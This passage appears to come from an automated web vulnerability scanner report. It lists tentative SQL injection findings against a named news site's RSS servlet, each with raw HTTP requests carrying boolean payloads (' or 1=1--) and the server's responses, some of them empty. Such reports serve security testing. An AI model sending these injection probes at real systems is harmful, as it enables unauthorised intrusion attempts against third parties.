<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.75. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:37 GMT
Date: Tue, 07 Dec 2010 23:18:37 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.76. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:18:40 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.77. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200917.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200917.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 43065906'%20or%201%3d1--%20 and 43065906'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi43065906'%20or%201%3d1--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:54 GMT
Date: Tue, 07 Dec 2010 23:21:54 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi43065906'%20or%201%3d2--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.78. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200918.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200918.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:10 GMT
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.79. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16674106'%20or%201%3d1--%20 and 16674106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16674106'%20or%201%3d1--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16674106'%20or%201%3d2--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:21 GMT
Date: Tue, 07 Dec 2010 23:21:21 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.80. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14517237'%20or%201%3d1--%20 and 14517237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss14517237'%20or%201%3d1--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

Request 2

GET /mngi/rss14517237'%20or%201%3d2--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.81. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200923.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200923.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.82. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200924.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200924.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48401163'%20or%201%3d1--%20 and 48401163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d1--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d2--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.83. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200925.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200925.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.84. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200927.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200927.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.85. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200929.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200929.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
